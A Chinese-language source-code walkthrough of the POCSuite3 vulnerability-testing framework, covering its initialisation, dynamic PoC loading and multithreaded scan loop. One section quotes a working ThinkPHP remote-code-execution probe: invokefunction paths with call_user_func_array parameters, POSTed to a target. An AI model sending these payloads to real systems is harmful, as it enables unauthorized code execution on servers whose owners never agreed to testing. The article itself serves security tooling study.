POCSuite3 是由知道创宇 404实验室开发维护的一款开源远程漏洞测试与概念验证 (PoC) 开发框架。为了深入理解其内部运行机制,本文将从源码层面,系统性解析该项目的初始化流程、多线程模型以及 PoC 模板的设计与加载等核心逻辑。
项目结构概览

项目主要目录及文件说明:
- api:对常用导入包进行重命名,方便后续调用。
- data:存储用户所需的文档数据。
- lib:项目核心代码所在。
- modules:存储用户自定义模块。
- plugins:存储用户自定义插件。
- pocs:存储 PoC 脚本文件。
- shellcodes:存储用于生成 PHP、Java、Python 等语言的利用代码,以及反弹 Shell 的利用代码。
- cli.py:项目的主要命令行入口。
- console.py:命令行交互界面。
入口点:cli.py 分析
程序从 /pocsuite3/cli.py 的 main() 函数开始执行。
def main():
"""
@function Main function of pocsuite when running from command line.
"""
try:
check_environment()
set_paths(module_path())
banner()
init_options(cmd_line_parser().__dict__)
data_to_stdout(" starting at {0}\n\n".format(time.strftime("%X")))
init()
try:
start()
except threading.ThreadError:
raise
check_environment():检查当前工作环境是否符合系统要求。
set_paths():设置后续需要用到的数据、目录路径信息。
banner():打印命令行横幅。
init_options(cmd_line_parser().__dict__):处理命令行参数。
命令行参数解析
cmd_line_parser() 函数负责解析命令行参数,它使用了 Python 的 argparse 模块。

其中,-c 参数值得注意:
target.add_argument("-c", dest="configFile", help="Load options from a configuration INI file")
用户可以先在 pocsuite.ini 配置文件中预设好参数,然后通过 pocsuite -c pocsuite.ini 命令运行,这为批量或复杂测试提供了便利。

全局变量初始化
深入 init_options() 函数,可以看到命令行参数被存储在了几个核心的全局字典对象中。

共有五个关键全局变量贯穿整个项目生命周期:
- conf:存储程序运行的基本配置信息。
- kb:知识库,存储目标地址、已加载的 PoC、运行模式、输出结果、PoC 文件路径、多线程状态等信息。
- cmd_line_options:存储原始的命令行输入的参数值。
- merged_options:存储命令行输入值与程序默认值合并后的最终选项。
- paths:存储数据、插件、poc 等各类目录的地址。
核心初始化流程:init() 函数
参数处理完毕后,程序进入 init() 函数进行项目初始化。以下是部分关键函数的注解:
def init():
"""
Set attributes into both configuration and knowledge base singletons
based upon command line and configuration file options.
"""
set_verbosity() # 设置日志输出级别
_adjust_logging_formatter() # 调整日志格式器
_cleanup_options() # 格式化各项配置并校验合法性
_basic_option_validation() # 校验 Seebug、ZoomEye 等 API Token 的合法性
_create_directory() # 检测必要文件路径是否存在,不存在则创建
_init_kb_comparison()
update()
_set_multiple_targets() # 读取并处理目标地址
_set_user_pocs_path()
_set_pocs_modules() # 动态加载 PoC 脚本
_set_plugins() # 动态加载插件
_init_targets_plugins()
_init_pocs_plugins()
_set_task_queue() # 初始化任务队列,为多线程做准备
_init_results_plugins() # 初始化输出结果插件
AttribDict 类解析
上文提到的五个全局变量,都是 AttribDict 类的实例。这个类简化了字典的访问方式。

AttribDict 类继承自 Python 内置的 OrderedDict,主要重写了三个特殊方法:
class AttrDict(OrderedDict):
"""
AttrDict extends OrderedDict to provide attribute-style access.
Items starting with __ or _OrderedDict_ can't be accessed as attributes.
"""
__exclude_keys__ = set()
def __getattr__(self, name):
if (name.startswith('__')
or name.startswith('_OrderedDict_')
or name in self.__exclude_keys__):
return super(AttrDict, self).__getattribute__(name)

这三个方法 (__getattr__, __setattr__, __delattr__) 逻辑相似。它们首先判断属性名是否属于以下三类“例外”:
- 以双下划线
__ 开头(如 Python 内置属性 __dict__)。
- 以
_OrderedDict_ 开头(OrderedDict 内部实现使用的名称)。
- 存在于
__exclude_keys__ 集合中。
如果满足任一条件,则跳过自定义处理,直接调用父类的对应方法。否则,就将属性作为字典的键来访问、设置或删除,从而实现 obj.attr 这种类似对象属性的访问方式。
目标地址处理逻辑
在 _set_multiple_targets() 函数中,程序读取并处理用户指定的目标。

函数首先检查 conf.url 中是否存在数据。如果存在,则创建一个 set 集合用于临时存储并去重。然后遍历 conf.url 列表,对每个地址调用 parse_target() 函数进行解析。如果解析成功(返回值不为空),则将其添加到临时集合中。最后,将集合中的所有目标添加到全局变量 kb.targets 中。
parse_target() 函数是地址解析的核心:
def parse_target(address):
target = None
if is_domain_format(address) or is_url_format(address) or is_ip_address_with_port_format(address):
target = address
elif is_ipv6_url_format(address):
conf.ipv6 = True
target = address
elif is_ip_address_format(address):
try:
ip = ip_address(address)
target = ip.exploded
except ValueError:
pass
else:
...
return target

其解析逻辑如下:
- 如果是域名、标准 URL 或
IP:端口 格式,直接赋值。
- 如果是
http://[IPv6] 格式,启用 IPv6 配置并赋值。
- 如果是纯 IPv4 或 IPv6 地址,使用 Python 内置的
ipaddress.ip_address() 方法进行标准化解析。
判断函数如 is_domain_format() 内部主要通过正则表达式实现。

动态 PoC 加载机制
_set_pocs_modules() 函数负责动态加载 PoC 脚本,这是框架灵活性的关键。

加载过程主要分为几个步骤:
Step 1: 从本地 pocs 目录加载
- 使用
os.listdir() 读取 pocs 目录,获取文件列表。
- 通过
filter() 和 lambda 函数过滤掉 __init__.py 和 __init__.pyc 等初始化文件。
- 使用
os.path.splitext() 将文件名拆分为(名称,扩展名)的元组,并构建字典,便于后续查找。
Step 2: 遍历并加载 PoC 文件
遍历配置中指定的 PoC 列表,根据文件名和后缀名构建完整的文件路径,然后调用核心函数 load_file_to_module(file_path) 进行加载。
Step 3: 从 Seebug 等在线平台加载 PoC(如果配置了相关选项)。
PoC 模板设计
所有 PoC 脚本都继承自一个基类 POCBase。以 pocsuite3/pocs 目录下的 thinkphp_rce 为例:

基类 POCBase 在 __init__ 方法中预定义了一系列属性,如目标地址、请求头、URL、模式等。

PoC 执行的核心是 execute() 方法:
def execute(self, target, headers=None, params=None, mode='verify', verbose=True):
self.target = target
self.url = parse_target_url(target) if self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP else self.build_url()
self.headers = headers
self.params = str_to_dict(params) if params else {}
self.mode = mode
self.verbose = verbose
self.expt = (0, 'None')
# TODO
output = None
try:
output = self._execute()

execute() 方法会根据协议类型解析目标 URL,并调用内部的 _execute() 方法。_execute() 则根据 mode(verify, attack, shell)的值,分别调用子类必须实现的 _verify(), _attack() 或 _shell() 方法。
以 thinkphp_rce 的 _verify() 方法为例:
def _verify(self):
result = {}
p = self._check(self.url)
if p:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = p[0]
result['VerifyInfo']['Postdata'] = p[1]
return self.parse_output(result)

它调用了 _check() 方法进行实际的漏洞检测:
def _check(self, url):
flag = 'Registered PHP Streams'
data = {
"function": "call_user_func_array",
"vars[0]": "phpinfo",
"vars[1][1]": "-1"
}
payloads = [
r"/?s=admin\think\app/invokefunction",
r"/admin.php?s=admin\think\app/invokfunction",
r"/index.php?s=think\think\app\invokefunction",
r"/index\think\Container\invokefunction",
r"/index.php?s=index\think\Container\invokefunction"
]
for payload in payloads:
vul_url = url + payload
r = requests.post(vul_url, data=data)
if flag in r.text:
return payload, dict(data)
return False

_check() 方法构造特定的 Payload 发送 HTTP 请求,并根据响应内容中是否包含预定义的 flag 字符串来判断漏洞是否存在。检测结果最终会通过 parse_output() 方法格式化为 JSON 输出。
动态加载核心:load_file_to_module()
让我们回到 _set_pocs_modules() 中的关键调用。

当成功构建 file_path 后,会调用 load_file_to_module(file_path)。

这个函数是 Python 动态加载的核心体现:
- 生成模块名:例如,文件
thinkphp_rce.py 对应的模块名为 pocs_thinkphp_rce。
- 创建模块规格(ModuleSpec):使用
importlib.util.spec_from_file_location(),并指定一个自定义的 PocLoader 作为加载器。
- 创建模块对象:使用
importlib.util.module_from_spec() 根据规格创建模块。
- 执行模块代码:调用
spec.loader.exec_module(mod),这会触发加载器的 exec_module() 方法。
PocLoader.exec_module() 方法负责最终的代码加载与执行:
def exec_module(self, module):
filename = self.get_filename(self.fullname)
poc_code = self.get_data(filename)
self.check_requires(poc_code)
obj = compile(poc_code, filename, 'exec', dont_inherit=True, optimize=-1)
exec(obj, module.__dict__)

这个过程包含了读取文件内容、检查依赖、将源代码编译为字节码,最后通过 exec() 函数在模块的命名空间内执行字节码,从而使模块中定义的类(如 DemoPOC)变得可用。这种设计使得 POCSuite3 能够灵活地加载外部的、用户编写的 PoC脚本,是框架可扩展性的基石。
多线程任务执行与结果输出
任务队列初始化
_set_task_queue() 函数负责创建任务队列。
def _set_task_queue():
if kb.registered_pocs and kb.targets:
for poc_module in kb.registered_pocs:
for target in kb.targets:
kb.task_queue.put((target, poc_module))

如果已加载的 PoC 和目标地址都不为空,则通过双重循环,将每一个 (target, poc_module) 元组放入线程安全的队列 kb.task_queue 中,为后续的多线程扫描做好准备。
启动扫描:start() 函数
初始化完成后,main() 函数调用 start() 启动扫描。
def start():
runtime_check()
tasks_count = kb.task_queue.qsize()
info_msg = "pocsuite got a total of {0} tasks".format(tasks_count)
logger.info(info_msg)
logger.debug("pocsuite will open {} threads".format(conf.threads))
try:
run_threads(conf.threads, task_run)
logger.info("Scan completed, ready to print")
finally:
task_done()
...

runtime_check():检查是否有 PoC 被成功加载。

- 获取任务队列大小并记录日志。
- 核心调用:
run_threads(conf.threads, task_run),启动多线程执行 task_run 函数。
finally 块中调用 task_done() 进行收尾工作。
多线程控制器:run_threads()
run_threads() 函数是通用的多线程启动器。
def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
threads = []

其主要逻辑如下:
- 线程数检查:如果线程数不大于1,则直接执行函数;如果大于1,则记录启动信息;如果超过最大线程数限制,则发出警告。

- 创建并启动线程:循环创建指定数量的线程,将目标函数设置为
exception_handled_function(内部会调用 thread_function),并设置为守护线程。

- 等待线程结束:通过循环检查所有线程的
isAlive() 状态,直到所有线程执行完毕。

结果处理与输出
所有扫描线程结束后,执行 task_done() 函数。
def task_done():
show_task_result()
result_plugins_start()
result_compare_handle()

show_task_result():从 kb.results 中取出所有 PoC 执行结果,并使用 PrettyTable 进行格式化表格输出。

result_plugins_start():启动结果输出插件,例如生成 HTML 报告。它会调用如 file_record.py 中插件的 start() 方法。


result_compare_handle():显示来自不同搜索引擎的对比数据(如果启用了比较功能)。

线程工作函数:task_run()
每个线程实际执行的是 task_run() 函数。
def task_run():
while not kb.task_queue.empty() and kb.thread_continue:
target, poc_module = kb.task_queue.get()
if not conf.console_mode:
poc_module = copy.deepcopy(kb.registered_pocs[poc_module])
poc_name = poc_module.name

- 循环取任务:只要任务队列不为空且线程继续运行标志为真,就从队列中获取一个
(target, poc_module) 任务。
- 深拷贝 PoC 模块:为防止多线程修改原始 PoC 模块对象,这里使用
copy.deepcopy() 进行深拷贝。
- 处理用户自定义参数:检查并设置用户通过命令行传递的自定义参数,同时进行白名单保护和必选参数校验。

- 执行 PoC:调用 PoC 模块的
execute() 方法进行漏洞验证或攻击,这是整个 安全测试 流程的核心动作。

- 处理结果:根据执行的成功或失败状态,更新结果字典,并调用插件处理结果,最后将结果追加到
kb.results 中。

总结与执行流程图
综合以上分析,POCSuite3 的核心执行流程可以归纳如下:

- 开始执行:
cli.py 中的 main() 函数被调用,进行环境检查和输入参数获取。
- 核心代码:
- 系统初始化:调用
init() 函数,完成配置加载、目标解析、PoC 与插件动态加载、任务队列初始化等。
- 启动扫描:调用
start() 函数,通过 run_threads() 创建多线程,每个线程执行 task_run() 函数,从队列中取任务并执行具体的 PoC 模板。
- 输出:所有线程结束后,进行结果格式化、报告生成等输出操作。
通过对 POCSuite3 的 源码分析,我们不仅理解了其模块化、插件化的设计思想,也深入掌握了其利用 Python 动态加载、多线程队列等机制实现高效、可扩展漏洞测试框架的具体方法。希望这篇分析能帮助你更好地使用或基于此框架进行二次开发。